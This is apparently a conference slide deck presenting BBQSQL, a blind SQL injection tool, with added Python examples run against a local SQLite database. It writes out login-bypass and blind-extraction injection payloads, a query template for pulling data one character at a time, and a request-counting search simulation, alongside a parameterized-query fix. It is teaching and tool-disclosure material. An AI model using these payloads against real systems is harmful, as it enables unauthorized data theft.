Who are we?

• Ben Toews
  o Security Consultant / Researcher at Neohapsis

• Scott Behrens
  o Security Consultant / Researcher at Neohapsis
Why are we here?

• BBQSQL

  New dog, old trick
  ■ Exploits Blind SQL Injection

  New dog, new trick
  ■ Fast
  ■ Easy
  ■ Gets those hard to reach spots
SQL What?

• Structured Query Language (SQL)
  o Language for interacting with a database

• SQL Injection
  o Inject syntax into an application's SQL queries
Basic SQL Injection

Normal Case:

UNAME = "mastahyeti"
PASS  = "s3cret"

QUERY = "select * from users where pass=md5('" + PASS + "') and uname='" + UNAME + "'";

QUERY evaluates to:

select *
from users
where pass=md5('s3cret')
and uname='mastahyeti'
Basic SQL Injection

SQL Injection Case:

UNAME = "pwned' or '1'='1";
PASS  = "pwned";

QUERY = "select * from users where pass=md5('" + PASS + "') and uname='" + UNAME + "'";

QUERY evaluates to:

select *
from users
where pass=md5('pwned')
and uname='pwned' or '1'='1'

AND binds tighter than OR, so the WHERE clause is (pass=md5('pwned') and uname='pwned') or '1'='1', which is true for every row: the password check never matters.
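The two cases above, as an added example that is not part of the original slides: the concatenated login query is run against an in-memory SQLite database (with an md5() function registered, since SQLite has none) to show that the injected username logs in without the password, next to the parameterized form of the same query, which does not. The table layout and the one user row are constructed for the example.

```python
# Added example (not from the slides): the deck's concatenated login query
# against an in-memory SQLite database, vulnerable form beside the fixed form.
import hashlib
import sqlite3


def md5_hex(value):
    """Stand-in for MySQL's md5(): hex digest of the UTF-8 bytes."""
    return hashlib.md5(value.encode("utf-8")).hexdigest()


def make_db():
    # Constructed sample data: one user, password stored as an md5 hex digest.
    conn = sqlite3.connect(":memory:")
    conn.create_function("md5", 1, md5_hex)      # SQLite has no md5(); add one
    conn.execute("create table users (uname text, pass text)")
    conn.execute("insert into users values (?, ?)", ("mastahyeti", md5_hex("s3cret")))
    return conn


def login_vulnerable(conn, uname, password):
    """String-concatenated query, exactly as on the slide: input becomes SQL."""
    query = ("select * from users where pass=md5('" + password + "')"
             " and uname='" + uname + "'")
    return conn.execute(query).fetchall()


def login_safe(conn, uname, password):
    """Same logic with bound parameters: the input can never change the SQL."""
    query = "select * from users where pass=md5(?) and uname=?"
    return conn.execute(query, (password, uname)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Normal case: correct credentials match one row either way.
    print(login_vulnerable(db, "mastahyeti", "s3cret"))
    print(login_safe(db, "mastahyeti", "s3cret"))
    # Injection case: the trailing "or '1'='1'" makes the WHERE clause always
    # true, so the concatenated query returns every user despite a bad password...
    print(login_vulnerable(db, "pwned' or '1'='1", "pwned"))
    # ...while the parameterized query just looks for a user literally named that.
    print(login_safe(db, "pwned' or '1'='1", "pwned"))
```

The only difference between the two functions is where the quoting happens: in `login_safe` the database driver binds the values after the statement has been parsed, so the attacker's quote is data, not syntax.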
Blind SQL Injection

• Still trying to alter SQL syntax
• Goal: dump the database
• More complex SQL syntax
• No query output comes back; each request only tells you whether the query was true or false
Blind SQL Injection

Blind SQL Injection Case:

UNAME = "' or (ASCII(SUBSTR((SELECT user()),1,1))>63) -- "
PASS  = "";

QUERY = "select * from users where pass=md5('" + PASS + "') and uname='" + UNAME + "'";

QUERY evaluates to:

select *
from users where pass=md5('')
and uname='' or (ASCII(SUBSTR((SELECT user()),1,1))>63) -- '
Blind SQL Injection

select *
from users where pass=md5('') and
uname=''
or (
    ASCII(                 << char -> int
      SUBSTR(              << slice string
        (SELECT user())    << current user
        ,1,1)              << first char
    ) > 63                 << 63 = '?'
) -- '                     << comment
Blind SQL Injection

• Binary (or other) search for each character
• One character at a time
• Time consuming
Blind SQL Injection

Lots of excellent tools out there
  o sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ...

Lots of great features

good job guys...

If these tools don't work
  o You end up writing a custom script, test, debug, test, debug...

What if there was a way to simplify tricky Blind SQL Injection attacks...
Images from http://www.freedigitalphotos.net/

BBQSQL

• Exploits Blind SQL Injection
• For those hard to reach spots
• Semi-automatic
• Database agnostic
• Versatile
• Fast
• Fast
• Did we mention it is fast?
BBQSQL : Use

• Must provide the usual information
  o URL
  o HTTP Method
  o Headers
  o Cookies
  o Encoding methods
  o Redirect behavior
  o Files
  o HTTP Auth
  o Proxies
  o ...
BBQSQL : Use

• Provide two additional pieces of info
  o Specify where the injection goes
  o Specify what syntax we are injecting
BBQSQL : Use

• The injection can go ANYWHERE:
  o url     => "http://google.com?vuln='${query}"
  o data    => "user=foo&pass=${query}"
  o cookies => {'PHPSESSID':'123123','FOO':'BAR${query}'}

• BBQSQL doesn't understand your data, so it doesn't care about your annoying:
  ■ serialization format
  ■ processes and rules
  ■ encodings
BBQSQL : Use

• The query specifies how to do the binary search:
  o query => "' and ASCII(SUBSTR((SELECT data FROM data LIMIT 1 OFFSET ${row_index:1}),${char_index:1},1))${comparator:>}${char_val:}#"

• The ${name:default} placeholders are the parts BBQSQL varies between requests: row_index and char_index walk the rows and characters, comparator and char_val are the question asked on each request

• Database agnostic
• Doesn't care about your annoying:
  o SQL syntax
  o Charset limitations
  o IDS/IPS
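A small renderer for the ${name} and ${name:default} placeholders shown on these two slides, added here as an example and not BBQSQL's own code. It fills the query template for one search step and then drops the rendered query into whichever request field carries ${query} (url, data, or every value of the cookies dict), which is what lets the injection "go anywhere". The placeholder grammar it accepts is exactly what the slides show; the helper names (render, render_fields, build_request) are this example's own.

```python
# Added example (not BBQSQL's code): ${name} / ${name:default} placeholder
# rendering for the query template and for the request field that carries it.
import re

# ${name} or ${name:default}; a default may be empty, as in ${char_val:}.
PLACEHOLDER = re.compile(r"\$\{(\w+)(?::([^}]*))?\}")


def render(template, **values):
    """Substitute placeholders; a missing name with no default is an error."""
    def sub(match):
        name, default = match.group(1), match.group(2)
        if name in values:
            return str(values[name])
        if default is not None:
            return default
        raise KeyError(f"no value for ${{{name}}}")
    return PLACEHOLDER.sub(sub, template)


def render_fields(fields, **values):
    """Render every value of a dict-valued field such as cookies."""
    return {key: render(val, **values) for key, val in fields.items()}


# The query template from the slide, with its defaults.
QUERY_TEMPLATE = ("' and ASCII(SUBSTR((SELECT data FROM data LIMIT 1 OFFSET "
                  "${row_index:1}),${char_index:1},1))${comparator:>}${char_val:}#")


def build_request(where, char_index, char_val, row_index=1, comparator=">"):
    """Render the query for one search step, then place it in the request field.

    `where` is the field template, e.g. "user=foo&pass=${query}". The rendered
    query is inserted verbatim: no URL-encoding is applied, matching the
    slides' point that the tool does not interpret the surrounding data.
    """
    query = render(QUERY_TEMPLATE, row_index=row_index, char_index=char_index,
                   comparator=comparator, char_val=char_val)
    return render(where, query=query)


if __name__ == "__main__":
    print(build_request("user=foo&pass=${query}", char_index=3, char_val=63))
    print(render_fields({"PHPSESSID": "123123", "FOO": "BAR${query}"},
                        query=render(QUERY_TEMPLATE, char_val=63)))
```

Because substitution is a single pass, a value that itself contains `${` is not expanded again, which is what you want when the injected syntax contains such characters.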
Demo?

Images from http://gossipsucker.com/

BBQSQL : Speed

• Concurrent HTTP requests
• Multiple search algorithms
  o Binary search
  o Frequency based search
BBQSQL : grequests

grequests = gevent + requests
BBQSQL : gevent

"gevent is a coroutine-based Python networking library that uses greenlet to provide a high-level synchronous API on top of the libevent event loop"
  - http://gevent.org
BBQSQL : gevent

• Coroutine ~ function
• You spawn many simultaneous coroutines
• Only one runs at a time
• When a coroutine encounters blocking (network IO) it yields and allows the next coroutine to run while it waits
• This forms an event loop
• Functionally, it appears to act like threading
BBQSQL : requests

"HTTP For Humans"
  - docs.python-requests.org

• Awesome HTTP API built on top of urllib3 in Python
• Written/maintained by Kenneth Reitz
  o API designing badass
BBQSQL : grequests

Good evented HTTP for Python
BBQSQL : Binary Search

O(log(n)) requests per character, n = size of the character range
BBQSQL : Linear Search

BBQSQL : Frequency

• Analysed lots of books, source code, CCs, SSNs :P
• Most common characters are [' ', 'e', 't', 'o', 'a']
• Most likely characters to follow 'e' are [' ', 'r', 'n']
BBQSQL : Frequency

• Very fast against non-entropic data:
  o English
    ■ ~10 requests/character
  o Python
    ■ ~8 requests/character
  o Credit card numbers
    ■ ~5.5 requests/character

• vs. binary search
  o English
    ■ ~12 requests/character
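The idea behind the frequency figures above, as an added example that is not BBQSQL's code: a search that first spends a few '=' requests on the characters most likely to follow the previous one, and only falls back to a full binary search when those guesses miss, compared with plain binary search on the same secret, counting oracle requests. The unigram and bigram statistics come from the short constructed corpus below rather than from the books, source code and card numbers the slides mention, the secret is constructed English text, and the guess-then-fall-back strategy is this example's own simplification, so the request counts illustrate the effect and are not the slides' numbers.

```python
# Added example (not BBQSQL's code): frequency-guided search vs binary search,
# counting the comparison requests each needs to recover the same secret.
from collections import Counter, defaultdict

# Constructed sample corpus (for the statistics) and constructed secret.
CORPUS = ("the user table stores the name and the password hash for each user "
          "the admin user owns the table and the other users only read the table")
SECRET = "the user"
TOP_K = 4            # '=' guesses to spend before falling back to binary search


class CountingOracle:
    """Stand-in for the injected page request: answers one comparison per call."""
    def __init__(self, secret):
        self.secret, self.queries = secret, 0

    def ask(self, char_index, comparator, value):
        self.queries += 1
        # Past the end of the string the "character" is 0, as ASCII('') would be.
        code = ord(self.secret[char_index - 1]) if char_index <= len(self.secret) else 0
        return code > value if comparator == ">" else code == value


def binary_char(oracle, char_index):
    """Plain binary search over the 128 ASCII codes: always 7 requests."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(char_index, ">", mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


class FrequencyModel:
    """Unigram and bigram counts from a corpus, used to rank candidate codes."""
    def __init__(self, corpus):
        self.unigram = Counter(corpus)
        self.bigram = defaultdict(Counter)
        for prev, nxt in zip(corpus, corpus[1:]):
            self.bigram[prev][nxt] += 1

    def ranked(self, prev):
        """All 128 codes, most likely first given the previous character
        (bigram count, then unigram count, then code as a stable tie-break)."""
        follow = self.bigram.get(prev, Counter())
        return sorted(range(128),
                      key=lambda c: (-follow[chr(c)], -self.unigram[chr(c)], c))


def frequency_char(oracle, char_index, model, prev):
    """Try the TOP_K most likely codes with '='; on a miss, binary search."""
    for code in model.ranked(prev)[:TOP_K]:
        if oracle.ask(char_index, "=", code):
            return code
    return binary_char(oracle, char_index)


def extract(oracle, strategy):
    """Recover the whole string; strategy(oracle, index, prev_char) -> code."""
    out, char_index = [], 1
    while True:
        code = strategy(oracle, char_index, out[-1] if out else None)
        if code == 0:
            return "".join(out)
        out.append(chr(code))
        char_index += 1


def compare(secret=SECRET, corpus=CORPUS):
    """Return ((recovered, requests) for binary, (recovered, requests) for frequency)."""
    model = FrequencyModel(corpus)
    o_bin = CountingOracle(secret)
    s_bin = extract(o_bin, lambda o, i, prev: binary_char(o, i))
    o_freq = CountingOracle(secret)
    s_freq = extract(o_freq, lambda o, i, prev: frequency_char(o, i, model, prev))
    return (s_bin, o_bin.queries), (s_freq, o_freq.queries)


if __name__ == "__main__":
    (s_bin, q_bin), (s_freq, q_freq) = compare()
    print(f"binary:    {s_bin!r} in {q_bin} requests")
    print(f"frequency: {s_freq!r} in {q_freq} requests")
```

The trade-off is visible in the miss case: a wrong guess costs TOP_K requests on top of the binary search, so the approach only pays off when the data really is predictable, which is why the slides quote the biggest gains for English and credit card numbers and why binary search stays available for everything else.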
BBQSQL : UI

• UI is built using source from the Social Engineering Toolkit (SET)
  o Thanks Dave (ReL1K) Kennedy!

• Input validation is performed on each configuration option in real time to prevent snafus
  o You don't have to wait till you type up a huge request on the CLI and find out your 600 char POST data is malformed!
BBQSQL : UI

• Configuration files can be imported and exported through UI or CLI
  o Uses ConfigParser so easy to work with

• Can export attack results as CSV file
Credits

• Wikipedia (math is hard)
• Neohapsis Labs
• Image links are embedded in presentation
• ReL1K - SET: https://www.trustedsec.com/downloads/social-engineer-toolkit/
Thanks

Ben Toews - @mastahyeti
Scott Behrens - @helloarbit

Neohapsis (.com) << Hiring
                 << bonus 4 us

BBQSQL
github.com/neohapsis/bbqsql